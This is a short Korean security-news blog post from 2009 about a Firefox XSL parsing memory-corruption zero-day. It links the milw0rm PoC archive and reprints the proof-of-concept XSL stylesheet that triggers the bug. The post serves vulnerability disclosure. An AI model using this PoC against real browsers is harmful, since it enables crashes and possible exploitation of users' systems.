본문 바로가기
취약점소식

[Firefox]Mozilla Firefox XSL Parsing Remote Memory Corruption PoC 0day

by 잡다한 처리 2009. 3. 26.
반응형


파이어폭스 XSL 취약점으로 인한 제로데이가 발견되었당
개인적으로 파폭은 안쓰지만~ 이로인한 악성코드가 발생 할 수 있는 확률은 크다 ㅠㅠ
// firefox XSL parsing remote memory corruption poc
// k`sOSe - works both in windows and linux
http://milw0rm.com/sploits/2009-ffox-poc.tar.gz
# milw0rm.com [2009-03-25]
[실제 악용 될 수 있는 코드]
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
    <xsl:key name="label" match="item2" use="w00t()"/>
    <xsl:template match="root">
                    <xsl:for-each select="//item1">
                        <xsl:call-template name="item1" />
                    </xsl:for-each>
    </xsl:template>
    <xsl:template name="item1">
                <xsl:for-each select="key('label', 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')">
                </xsl:for-each>
    </xsl:template>
</xsl:stylesheet>

저작자표시 비영리 변경금지

'취약점소식' 카테고리의 다른 글

[PowerPoint]Microsoft PowerPoint File Parsing Remote Code Execution Vulnerability  (2) 2009.04.03
[Opera]Opera 9.64 (7400 nested elements) XML Parsing Remote Crash Exploit  (0) 2009.03.31
[TrendMicro]Trend Micro Internet Security Pro 2009 Priviliege Escalation PoC  (0) 2009.03.31
[Gom]Gom Encoder (Subtitle File) Buffer Overflow PoC  (0) 2009.03.17
[Excel]Microsoft Excel Invalid Object Remote Code Execution Vulnerability  (0) 2009.02.25

관련글

댓글

티스토리툴바